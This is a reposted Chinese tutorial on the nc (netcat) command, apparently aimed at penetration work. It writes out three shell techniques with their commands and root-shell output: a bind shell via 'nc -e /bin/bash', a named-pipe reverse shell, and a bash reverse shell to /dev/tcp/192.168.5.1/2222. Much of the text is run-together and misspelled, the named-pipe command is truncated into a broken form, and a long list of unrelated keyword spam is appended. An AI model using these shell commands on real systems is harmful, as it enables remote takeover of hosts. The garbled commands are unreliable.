linux命令——nc
发表于:2024-10-21 作者:千家信息网编辑
千家信息网最后更新 2024年10月21日,nc帮助文档上面说的是TCP/IP协议中的swiss army knife,是一个使用tcp或udp协议通过网络连接来读写数据的一个简单的多功能的工具!在***中经常用于反弹shell,用于交互式执行
千家信息网最后更新 2024年10月21日linux命令——nc
nc帮助文档上面说的是TCP/IP协议中的swiss army knife,是一个使用tcp或udp协议通过网络连接来读写数据的一个简单的多功能的工具!在***中经常用于反弹shell,用于交互式执行shell,或者用于提权!
基本使用语法:
nc 选项 IP port
基本参数说明:
-l:监听端口,监听入站信息-p:后跟本地端口号-v:显示端口的信息,多数人喜欢使用-vv,但是我用了没看到有什么区别
第一种方法:
第一种的话需要目标主机直接就是外网独立ip才可以,如果是通过内网映射出来的,就不适用这个方法了!
目标主机:
nc -lvp 2222 -e /bin/bash
root@kali:~# nc -lvp 2222 -e /bin/bashlistening on [any] 2222 ...
***主机:
nc 目标机IP 2222
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc 192.168.5.128 2222
此时我们查看目标主机:
root@kali:~# nc -lvp 2222 -e /bin/bashlistening on [any] 2222 ...192.168.5.1: inverse host lookup failed: Unknown hostconnect to [192.168.5.128] from (UNKNOWN) [192.168.5.1] 14960
此时我们在***机就可以执行命令了!
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc 192.168.5.128 2222whoamirootuname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第二种方法:
第二种方法,需要我们有独立外网ip,用于监听返回来的shell!
目标主机:
root@kali:~# mknod /tmp/backpipe proot@kali:~# /bin/sh 0/tmp/backpipe
***主机:
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222lstn on [any] 2222 ..192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATAconnect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53404: NO_DATAwhoamirootuname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第三种:
第三种方法需要我们有独立的外网ip,用于接收shell!
目标主机:
root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
***主机:
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222lstn on [any] 2222 ..192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATAconnect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATAroot@kali:~# uname -auname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linuxroot@kali:~# whoamiwhoamirootroot@kali:~#exit
工具
主机
目标
方法
工具包
独立
监听
信息
端口
命令
交互式
参数
口号
后跟
多功能
就是
数据
文档
网络
语法
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
同仁堂软件开发待遇好不好
数据库次数据文件扩展名
越秀区网络安全
网站建设服务器选择
网络技术三级哪些题型
城市天际线运行多少个服务器
建立学生信息表数据库
pg数据库完全删除
水滤镜软件开发
ssh服务器在哪里
互联网科技奖
网络安全法第三方保密
三维软件开发需要什么
网互联网科技有限公司怎么样
网络安全管理师有什么用
软件开发必须学历吗
小度网络安全手抄报上面
plsql删除数据库表示例
网络安全责任有哪几种
重庆互联网科技公司排名
北京意信网络技术
端游绝地求生服务器卡
两个数据库数据比对
hp服务器dl380
工控使用什么服务器系统
网络技术视频素材
4g服务器安全吗
数据库判断安全性
网络技术有利的辩论
中科院数据库